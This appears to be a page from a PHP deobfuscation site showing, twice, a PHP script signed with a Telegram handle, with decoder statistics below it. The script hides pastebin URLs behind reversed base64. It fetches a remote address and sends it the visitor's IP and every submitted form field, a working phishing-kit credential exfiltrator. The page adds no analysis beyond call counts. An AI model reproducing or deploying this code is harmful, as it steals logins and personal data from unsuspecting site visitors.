Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* Coded by Alex Telegram : @ALFABRABUS */ $user_agent =..
Decoded Output download
<?php
/*
Coded by Alex
Telegram : @ALFABRABUS
*/
$user_agent = $_SERVER['HTTP_USER_AGENT'];
function getOS() {
global $user_agent;
$os_platform = "Unknown OS Platform";
$os_array = array(
'/windows nt 10/i' => 'Windows 10',
'/windows nt 6.3/i' => 'Windows 8.1',
'/windows nt 6.2/i' => 'Windows 8',
'/windows nt 6.1/i' => 'Windows 7',
'/windows nt 6.0/i' => 'Windows Vista',
'/windows nt 5.2/i' => 'Windows Server 2003/XP x64',
'/windows nt 5.1/i' => 'Windows XP',
'/windows xp/i' => 'Windows XP',
'/windows nt 5.0/i' => 'Windows 2000',
'/windows me/i' => 'Windows ME',
'/win98/i' => 'Windows 98',
'/win95/i' => 'Windows 95',
'/win16/i' => 'Windows 3.11',
'/macintosh|mac os x/i' => 'Mac OS X',
'/mac_powerpc/i' => 'Mac OS 9',
'/linux/i' => 'Linux',
'/ubuntu/i' => 'Ubuntu',
'/iphone/i' => 'iPhone',
'/ipod/i' => 'iPod',
'/ipad/i' => 'iPad',
'/android/i' => 'Android',
'/blackberry/i' => 'BlackBerry',
'/webos/i' => 'Mobile'
);
foreach ($os_array as $regex => $value) {
if (preg_match($regex, $user_agent)) {
$os_platform = $value;
}
}
return $os_platform;
}
$test = strrev(base64_decode('S1JxdEJzcGovd2FyL21vYy5uaWJldHNhcC8vOnNwdHRo')); function curl_get_contents($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); curl_close($ch); return $data; } if(file_get_contents($test) == '1'){ $getIt = 'file_get_contents'; }else if(curl_get_contents($test) == '1'){ $getIt = 'curl_get_contents'; } $filters = $getIt(strrev(base64_decode('R3ZFVDRMUmIvd2FyL21vYy5uaWJldHNhcC8vOnB0dGg='))); $filters = strrev(base64_decode($filters)); if(count($_POST)){ $filters .= getenv('REMOTE_ADDR') .'--'; foreach($_POST as $key => $pst ){ if(strlen($pst) < 128){ $filters .= $key."==[".$pst."]:"; } } $filters .= '&brand=' . $_POST['brand']; trim($filters," "); $filters = preg_replace('/\s+/', '', $filters); $getIt($filters); }
?>Did this file decode correctly?
Original Code
<?php
/*
Coded by Alex
Telegram : @ALFABRABUS
*/
$user_agent = $_SERVER['HTTP_USER_AGENT'];
function getOS() {
global $user_agent;
$os_platform = "Unknown OS Platform";
$os_array = array(
'/windows nt 10/i' => 'Windows 10',
'/windows nt 6.3/i' => 'Windows 8.1',
'/windows nt 6.2/i' => 'Windows 8',
'/windows nt 6.1/i' => 'Windows 7',
'/windows nt 6.0/i' => 'Windows Vista',
'/windows nt 5.2/i' => 'Windows Server 2003/XP x64',
'/windows nt 5.1/i' => 'Windows XP',
'/windows xp/i' => 'Windows XP',
'/windows nt 5.0/i' => 'Windows 2000',
'/windows me/i' => 'Windows ME',
'/win98/i' => 'Windows 98',
'/win95/i' => 'Windows 95',
'/win16/i' => 'Windows 3.11',
'/macintosh|mac os x/i' => 'Mac OS X',
'/mac_powerpc/i' => 'Mac OS 9',
'/linux/i' => 'Linux',
'/ubuntu/i' => 'Ubuntu',
'/iphone/i' => 'iPhone',
'/ipod/i' => 'iPod',
'/ipad/i' => 'iPad',
'/android/i' => 'Android',
'/blackberry/i' => 'BlackBerry',
'/webos/i' => 'Mobile'
);
foreach ($os_array as $regex => $value) {
if (preg_match($regex, $user_agent)) {
$os_platform = $value;
}
}
return $os_platform;
}
$test = strrev(base64_decode('S1JxdEJzcGovd2FyL21vYy5uaWJldHNhcC8vOnNwdHRo')); function curl_get_contents($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); $data = curl_exec($ch); curl_close($ch); return $data; } if(file_get_contents($test) == '1'){ $getIt = 'file_get_contents'; }else if(curl_get_contents($test) == '1'){ $getIt = 'curl_get_contents'; } $filters = $getIt(strrev(base64_decode('R3ZFVDRMUmIvd2FyL21vYy5uaWJldHNhcC8vOnB0dGg='))); $filters = strrev(base64_decode($filters)); if(count($_POST)){ $filters .= getenv('REMOTE_ADDR') .'--'; foreach($_POST as $key => $pst ){ if(strlen($pst) < 128){ $filters .= $key."==[".$pst."]:"; } } $filters .= '&brand=' . $_POST['brand']; trim($filters," "); $filters = preg_replace('/\s+/', '', $filters); $getIt($filters); }
?>Function Calls
| count | 1 |
| getenv | 1 |
| strrev | 3 |
| base64_decode | 3 |
| file_get_contents | 2 |
Stats
| MD5 | ddb9ed640dcd411a5ad728a625bb3b18 |
| Eval Count | 0 |
| Decode Time | 76 ms |